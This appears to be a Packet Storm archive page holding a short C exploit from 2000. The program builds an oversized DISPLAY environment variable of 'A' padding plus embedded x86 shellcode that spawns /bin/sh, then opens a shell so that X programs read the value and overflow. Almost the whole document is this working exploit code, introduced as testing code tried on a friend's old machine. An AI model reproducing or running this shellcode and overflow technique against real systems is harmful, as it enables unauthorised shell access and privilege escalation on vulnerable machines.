Some testing code I put together to try on a friend's old machine, it essentially tries to overflow the DISPLAY variable in X-based programs.
7613d5b29ec47d7d33a9be662b0d6ff29d63ff54026a3473136af5f95fc5b577/*
* Little program for testing X programs
* (c) 2000 - missnglnk <missnglnk@tribune.intranova.net>
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
int main(int argc, char **argv)
{
char shellcode[] = "\xeb\x0d\x5e\x31\xdb\x31\xc0\x53\x53\x56\x56\xb0\x3b\xcd\x80\xe8\xee\xff\xff\xff/bin/sh\x00";
char *buf;
int len;
int i;
if (argc != 2) {
printf("%s [number of bytes]\n", argv[0]);
return -1;
}
if ((buf = malloc(atoi(argv[1]))) == NULL) {
perror("malloc()");
return -1;
}
len = atoi(argv[1]) - (strlen(shellcode) + 3);
for (i = 1; i <= len; i++) {
buf[i - 1] = 'A';
}
snprintf(buf, atoi(argv[1]), "%s%s:0", buf, shellcode);
if (setenv("DISPLAY", buf, 0) != 0) {
perror("setenv()");
return -1;
}
system("/bin/sh");
return 0;
}
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed